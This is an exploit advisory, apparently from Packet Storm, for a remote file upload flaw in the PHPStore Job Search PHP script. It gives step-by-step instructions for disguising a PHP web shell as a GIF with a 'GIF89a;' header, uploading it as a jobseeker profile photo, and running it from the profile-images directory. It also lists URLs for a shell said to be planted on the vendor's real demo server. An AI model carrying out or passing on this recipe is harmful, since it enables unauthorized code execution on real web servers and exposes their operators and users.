PHP Store PHP Job Search Script suffers from a remote file upload vulnerability.
1ee13ee62361eeae5f1ed6a9529b4dcd89c85e77943a0c9408b8a4f0e85ac8dcPHPStore Job Search Remote File Upload
Author: ZoRLu msn: trt-turk@hotmail.com
home: www.z0rlu.blogspot.com
N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-----------------------------------------
exploit:
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
<?
...
...
...
?>
and save your_sheell.php
you register site and this site questions your photo. you upload your_shell.php
you clikc to view resume and open new page ( direckt link: http://localhost/script/preview.php )
you must see your photo
and right click to your photo select to properites
after copy photo link and paste your explorer go your shell
your_shell.php
http://localhost/script/jobseekers/jobseeker_profile_images/[id]_offer_your_shel.php
---------------------------------------------
example for demo:
shell: ( not permission for demo server )
http://www.phpstore.info/demos/phpcareers/jobseekers/jobseeker_profile_images/1226242993_offer_c.php
http://www.phpstore.info/demos/phpcareers/jobseekers/jobseeker_profile_images/ ( you look here and see shell 1226242993_offer_c.php )
------------------------------------------------
thanks: str0ke & yildirimordulari.org & darkc0de.com
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed